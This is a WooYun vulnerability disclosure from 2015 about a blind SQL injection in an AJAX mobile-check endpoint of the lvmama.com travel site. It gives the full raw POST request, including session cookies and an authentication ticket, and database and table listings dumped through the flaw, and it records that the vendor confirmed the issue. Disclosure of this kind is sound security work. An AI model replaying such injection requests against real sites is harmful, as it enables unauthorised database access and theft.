当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148709

漏洞标题:驴妈妈旅游网主站SQL注入漏洞(DBA权限/时间盲注)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-10-22 22:02

修复时间:2015-12-07 10:08

公开时间:2015-12-07 10:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

我有一只小毛驴 我从来也不骑

详细说明:

1.png


POST /zt/promo/tiyan/?action=ajaxCheckMobile HTTP/1.1
Host: www.lvmama.com
Proxy-Connection: keep-alive
Content-Length: 27
Accept: */*
Origin: http://www.lvmama.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.lvmama.com/zt/promo/tiyan/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKcFYoqTOvWkHYA3IUAg==; JSESSIONID=7D9FB3B20729F4A7D63BACA524B8C2D7; lvsessionid=77cdc52b-bbb1-4078-a9ee-c846857de9ce_19244332; ip_from_place_id=1;
ip_from_place_name=""; ip_area_location=BJ; ip_location=114.252.84.34; ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; cmTPSet=Y;
CoreID6=26730210502814455055673&ci=90409730; CASTGC=TGC-4921-Im1Xet49C2p2Sqim9PUMnXsoCliDwoxdrf32vFfQE2emB6cuNd; unUserName=mtestqingyouawlk;
LSTA=792dda8547d49ad39f58801a348ac4a5; UN=mtestqingyouawlk%5E%21%5E4028b25b5024472e01502b7213020a7b; Rvyz72RO3yiChuCn=pqgqxfQmNx9c%2F0Yno%2Fe8a5arc2IL6Ob58ZNWq%2B9lLBaZ
%2F2YuMZ9%2F6zCLVoK6DjCkqo7bKb7OYP9tarloBj7m4BLf3TGzNiwNUZfhF1jqowxuFs9nrE%2FiIBAifqCiQ9oBI69L82ZR405tfu%2BjdCglHdvvoPMO977i7YiapmUiAM0VHky26gsEP6XKn7S0ERXHBvKEoxFYFZoIv
%2BXDNjNBrehw%2F1734kME%2Brg2sH4IF2zioRtX348B%2FQv4h6H%2FBipHImrTUnGgqLYQ1OJg%2FDMME6dp1BHibzwzbaTKSEskNM7LBPhKGiw9CGTnRvGp3JBzs70yScABm7NqxkfDO9KDBqSc
%2F4%2FVdWQZ3o6EzCZWZ3mmCDULs00TFBiaM%2BYy9G1NAiTdT75cUZfu3P2hSCYN%2Bo5IiQBkGt7cNUgyeIPu0fYTNnHzcQTxjACGZ%2FZQB03oj73JSohT7kEJbAIsW8B2xQ%3D
%3De7666be56e679c9b8dc871b127172c86aa7d6a4b; jXVJUTNgMEfp6rEr=x4C1i4MC%2BcO%2FQGxRmML7WkGYPGOS6e47%2Fy
%2FLfo2di3FkRS0EtCOb6PP582MjxzpjiTLv0WvEcfoXKVvHIaqYDHXaor4WuYcG8MswKnyyuNQ066v%2BXmd34AeZB%2B%2FQhTwKeAIaO8RwfOqdXK3oElH1Zy6aOJ
%2BNGrpKru0pmV3RABWkmwhsKWklbeIOJoA9CwJBd0n5rgvB2SsoxjIuVi0Ejdy1Vtnk5IuH7QhK5eMW4W%2B6TLoLUurF7O
%2BIuPzWctnF4pBwd05NiMC2cmoxaTlAwPT4BGXnYZitDtV5MUWxffVxBULd74nw1hhOYcMLppb0dvsPh4l45EKFLJTrmdNV66KqNntlOopUT5zX1Ygqag27wvWrLJeHSAlwPwK%2BKoqzjtsmQ0qFT8aoCZzPW4V6BWC%2BKK
%2FbaSQ6T8yWGlbfj%2F%2FhsUo4AaPaKczFlfooJ6RgxPCpjH53mxDvPDA9j3zyzA%3D%3De53ff81bda77409744ed2b55b88ea310c530ee39; __xsptplus443=443.2.1445508536.1445508613.3%234%7C%7C%7C%7C
%7C%23%23BRdhnsZ84BUthos4CDqxRNnCZtzoV45B%23; MY_SPACE_READ_IS_TRUE_4028b25b5024472e01502b7213020a7b=true; orderFromChannel=bing; bqeRoYZ7gjxuUl7T=OwvnYXLUjsh%2Fz
%2BmwW0cBfGraAT7LDwOE79OvBV0QMw%2BpLM07PJ06ts9m9MvwWVdjiJ2AqrK4V9V1GGoUsMcjWfUYxst0E5iTzJl0o3csBYdKnsw6HSZubOlmru3vwWLqnfx5rPofwtM8rcgFhbLZPToa0Dl55EMKbMR7Ifeg0gNjFyOKIg8Us
%2BR7PPganxwvus7s6zL1lDV7b09gNntHbau022SQwQnukfI74ORuo%2BFhDNtVBrN5vHWDqSMX%2FrAdil7AG8ptGE6i9NMUivbKyZEHFbrgSuMfWMXSNjN8MFNMcbRMt2gwCZ7pyCod0uHN5ASTOQl%2BT8xmH
%2BT6go9p19B6s1J%2FqCZ4plsAf4VVIB6iCx%2FSokquorsFL6yEuwXCEPAiV7Wl6Eliwht003L1s9Ht3eKhu78uQC%2Bt5PxMM%2BuQ0%2FOwtM76K2ZBTcWa1%2BEfL89PyAb5qfFzSwo4lXRMkw%3D
%3D2e2d34ca91ffed54a34fe9368ad96cbae4525505; 90409730_clogin=v=1&l=1445510761&e=1445512692709; 90409730_clogin=v=1&l=1445510761&e=1445512696872;
__utma=30114658.1836242761.1445505611.1445508536.1445510762.3; __utmb=30114658.8.10.1445510762; __utmc=30114658; __utmz=30114658.1445505611.1.1.utmcsr=(direct)|utmccn=
(direct)|utmcmd=(none); bfd_s=30114658.6828180.1445505611373; tmc=7.30114658.28977164.1445510762118.1445510881016.1445510899060;
tma=30114658.52204097.1445505611374.1445505611374.1445505611374.1; tmd=25.30114658.52204097.1445505611374.; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1445505610;
Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1445510899; bfd_g=8d94ecf4bbcd473800002bfa00004d115628aa4b
undefined&value=13800138000

漏洞证明:

权限:

1.png


available databases [18]:
[*] info
[*] infonews
[*] information_schema
[*] lmm_core
[*] lmm_customization
[*] lmm_guide
[*] lmm_logs
[*] lmm_lvyou
[*] lmm_message
[*] lmm_module
[*] lmm_subject
[*] lmm_subjects2
[*] lmm_weather
[*] lvmamabus
[*] minisite
[*] mysql
[*] others
[*] post_robot


1.png


Database: lmm_lvyou
[116 tables]
+------------------------------------------+
| biz_dest_relation |
| ly_activity |
| ly_activity_block |
| ly_address |
| ly_biz_dest |
| ly_biz_district |
| ly_bonus |
| ly_bonus_set |
| ly_category |
| ly_com_coordinate |
| ly_communication |
| ly_consulate |
| ly_consulate_info |
| ly_contact |
| ly_coordinate |
| ly_cost |
| ly_data |
| ly_dest |
| ly_dest_bak |
| ly_dest_org_down_week_view |
| ly_dest_payment |
| ly_dest_type |
| ly_destination |
| ly_destination_20150305bak |
| ly_destination_org_view |
| ly_destination_subject_relation_new_view |
| ly_diary |
| ly_diary_150202bak |
| ly_diary_bak4 |
| ly_diary_temp |
| ly_district |
| ly_district_type |
| ly_elite_image |
| ly_facility |
| ly_feature |
| ly_festival |
| ly_food |
| ly_food_bak |
| ly_food_dest |
| ly_food_dest_subject_relation_view |
| ly_food_recommend |
| ly_food_type |
| ly_goods |
| ly_goods_bak |
| ly_goods_dest |
| ly_goods_recommend |
| ly_hot_user |
| ly_monthrec |
| ly_must |
| ly_payment |
| ly_payment_dest |
| ly_payment_type |
| ly_pk_count |
| ly_play_type |
| ly_product_set |
| ly_recommend |
| ly_recommend_block |
| ly_restaurant |
| ly_room_type |
| ly_s_picture |
| ly_s_picture_bak1 |
| ly_s_picture_bak4 |
| ly_s_picture_view |
| ly_s_text |
| ly_scenic_viewspot |
| ly_segment |
| ly_segment_150202bak |
| ly_segment_bak4 |
| ly_segment_temp |
| ly_segment_temp2 |
| ly_segment_temp3 |
| ly_stack |
| ly_stack_bak |
| ly_stay |
| ly_stay_dest |
| ly_stay_hotel |
| ly_stay_type |
| ly_subject |
| ly_suggest_time |
| ly_tag |
| ly_tag_item |
| ly_tdk |
| ly_ticket |
| ly_time |
| ly_trace |
| ly_trace_150202bak |
| ly_trace_bak4 |
| ly_trace_temp |
| ly_transportation |
| ly_travel |
| ly_travel_day |
| ly_travel_day_dest |
| ly_trip |
| ly_trip_150202bak |
| ly_trip_bak |
| ly_trip_bak4 |
| ly_trip_dest |
| ly_trip_score_group_view |
| ly_trip_score_view |
| ly_trip_statistics |
| ly_trip_temp |
| ly_trip_temp2 |
| ly_trip_temp3 |
| ly_visa |
| ly_visa_consulate |
| ly_visa_consulate_info |
| ly_xls_day |
| ly_xls_pictrue |
| ly_xls_pictrue_bak0413 |
| ly_xls_trace |
| ly_xls_trip |
| ly_xls_user |
| v_ly_bonus |
| v_ly_diary |
| v_ly_trip |
| v_ly_trip2 |
+------------------------------------------+

修复方案:

修复吧 被脱裤子就不好了 挖的我好辛苦

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-23 10:07

厂商回复:

thx

最新状态:

暂无


漏洞评价:

评论